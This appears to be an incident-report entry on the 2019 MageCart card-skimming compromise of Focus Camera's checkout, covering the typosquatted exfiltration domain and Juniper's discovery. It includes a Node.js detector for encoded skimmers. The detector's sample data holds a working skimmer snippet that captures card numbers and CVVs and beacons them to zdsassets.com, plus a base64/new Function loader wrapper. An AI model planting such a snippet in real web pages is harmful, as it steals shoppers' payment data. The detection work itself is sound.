
Cyber Incident Victim: Focus Camera

Date:

Nov 2019

Location:

United States of America

Summary

A photography retailer's website was compromised by MageCart attackers who injected a skimming script into the checkout process to steal customer payment information. The script captured billing details including names, addresses, phone numbers, email addresses, and full credit card data during guest transactions. The attackers exfiltrated the stolen data to a domain that impersonated a legitimate ZenDesk asset domain. Security researchers discovered the compromise while analysing the obfuscated JavaScript payload, and DNS telemetry showed substantial resolution volume for the attacker-controlled domain. After notification delays caused by time zone and weekend scheduling, the retailer removed the malicious code on the day it was alerted.


Description

In late 2019, MageCart attackers compromised the website of photography retailer Focus Camera by injecting malicious JavaScript designed to steal customer payment card information during checkout. The attackers registered the domain "zdsassets.com" on November 11, 2019, deliberately mimicking the legitimate ZenDesk asset domain "zdassets.com" so that the outbound requests would blend in with expected third-party traffic. Hosted on a Netherlands-based server, this domain served as the exfiltration endpoint for the stolen data. The skimming script activated when customers checked out as guests without creating an account, capturing billing details including names, email addresses, physical addresses (both billing and shipping), phone numbers, and full payment card information (card numbers, expiration dates, and CVV codes). The payload was base64-encoded to hide it from casual inspection and injected into a legitimate JavaScript file on Focus Camera's website, operating in typical MageCart fashion by intercepting form submissions.
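The pattern described above (a base64-encoded blob appended to a first-party script, hooking the checkout form and beaconing card fields to a look-alike of a trusted third-party host) can be hunted for statically. The Node.js scanner below is an added example, not Juniper's tooling or anything from Focus Camera's site: it decodes quoted base64 literals, looks for payment-field and form-hook indicators in the decoded text, extracts the hosts it talks to, and flags hosts within edit distance 2 of an allow-listed domain as typosquats. The allow-list, the indicator regexes and the sample scripts are all constructed for the example; the skimmer body is a minimal stand-in, not the real payload.

```javascript
// Added example (not the page's or Juniper's code): static scan of a JavaScript
// file for a base64-encoded skimmer that beacons to a look-alike domain.

// Assumed allow-list of third-party hosts the site legitimately contacts.
const ALLOWED_HOSTS = ['static.zdassets.com', 'zdassets.com'];

// Indicator regexes (constructed for this example, tune per site).
const PAYMENT_HINTS = /cc_?num|card|cvv|cvc|exp(ir|_)|billing|checkout|postcode|phone/i;
const FORM_HOOK_HINTS = /['"]submit['"]|onsubmit|\.submit\s*\(|['"]click['"]|beforeunload/;
const EXFIL_HINTS = /new Image\b|sendBeacon|fetch\s*\(|XMLHttpRequest|WebSocket/;

// Naive registrable domain (last two labels); a real tool would use a public-suffix list.
function registrable(host) {
  return host.toLowerCase().split('.').slice(-2).join('.');
}

// Standard Levenshtein distance, used to spot typosquats of allowed domains.
function editDistance(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      dp[i][j] = Math.min(dp[i - 1][j] + 1, dp[i][j - 1] + 1, dp[i - 1][j - 1] + cost);
    }
  }
  return dp[a.length][b.length];
}

// Returns the allowed domain this host imitates (distance <= 2), or null.
function lookalikeOf(host, allowed = ALLOWED_HOSTS) {
  const reg = registrable(host);
  const allowedRegs = new Set(allowed.map(registrable));
  if (allowedRegs.has(reg)) return null;
  for (const a of allowedRegs) if (editDistance(reg, a) <= 2) return a;
  return null;
}

// Quoted base64 literals of 40+ chars, kept only when they decode to printable text.
function findEncodedText(src) {
  const out = [];
  const re = /['"`]([A-Za-z0-9+/]{40,}={0,2})['"`]/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    const text = Buffer.from(m[1], 'base64').toString('utf8');
    if (/^[\x20-\x7e\r\n\t]+$/.test(text)) out.push(text);
  }
  return out;
}

// Hostnames of absolute http(s) URLs found in the decoded text.
function extractHosts(text) {
  const hosts = [];
  const re = /https?:\/\/([a-z0-9.-]+\.[a-z]{2,})/gi;
  let m;
  while ((m = re.exec(text)) !== null) hosts.push(m[1].toLowerCase());
  return hosts;
}

// One finding per decoded blob, with a coarse severity for triage.
function scanScript(src, allowed = ALLOWED_HOSTS) {
  const allowedRegs = new Set(allowed.map(registrable));
  return findEncodedText(src).map((text) => {
    const hosts = extractHosts(text).map((host) => ({
      host,
      allowed: allowedRegs.has(registrable(host)),
      lookalikeOf: lookalikeOf(host, allowed),
    }));
    const touchesPayment = PAYMENT_HINTS.test(text);
    const hooksForms = FORM_HOOK_HINTS.test(text);
    const exfiltrates = EXFIL_HINTS.test(text) && hosts.some((h) => !h.allowed);
    const severity = touchesPayment && hooksForms && exfiltrates ? 'high'
      : (touchesPayment || hooksForms) && exfiltrates ? 'medium' : 'info';
    return { severity, touchesPayment, hooksForms, exfiltrates, hosts };
  });
}

// Constructed skimmer stand-in (not the real payload), used only to build a sample file.
const SKIMMER = "document.querySelector('form#checkout').addEventListener('submit',function(){" +
  "var f=this,d={};['firstname','email','telephone','cc_number','cc_exp','cc_cvv']" +
  ".forEach(function(n){var e=f.querySelector('[name='+n+']');d[n]=e?e.value:''});" +
  "(new Image).src='https://zdsassets.com/t.gif?q='+btoa(JSON.stringify(d))});";

// Constructed first-party script with the encoded blob appended, as a hostile edit would look.
const LEGIT_PART = "function trackPage(p){window.dataLayer=window.dataLayer||[];dataLayer.push({page:p});}\n";
const SAMPLE_SCRIPT = LEGIT_PART +
  "var _z='" + Buffer.from(SKIMMER).toString('base64') + "';(new Function(atob(_z)))();\n";
const CLEAN_SCRIPT = LEGIT_PART;

console.log(JSON.stringify(scanScript(SAMPLE_SCRIPT), null, 2));
```

Running it reports one high-severity finding whose only host, zdsassets.com, is flagged as a look-alike of zdassets.com. Two caveats a practitioner should keep in mind: an edit-distance check only catches near-miss names, so it should sit beside a strict allow-list of script and connect destinations (the same list a Content-Security-Policy `img-src`/`connect-src` would enforce at runtime, which would have blocked the beacon outright), and base64 is only one of many encodings used by skimmers, so the decoder is a starting point rather than a complete detector.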


Juniper Threat Labs researcher Mounir Hahad discovered the skimming script in late December 2019 during routine analysis and decoded the base64-encoded routine to reveal its data theft functionality. DNS telemetry indicated the attacker-controlled domain had been resolved 905 times since its registration, a rough proxy for victim volume, although Hahad noted it was unclear whether the same infrastructure served other campaigns. After confirming the compromise, Juniper attempted to notify Focus Camera but was delayed by time zone differences and the weekend. Once contact was established several days later, the researchers shared their findings with the retailer's domain administrators, who removed the malicious code by the end of that day. The incident exposed sensitive customer financial data through direct interception during transactions; the source provides no details on subsequent customer notifications or on a forensic investigation into the initial intrusion vector.
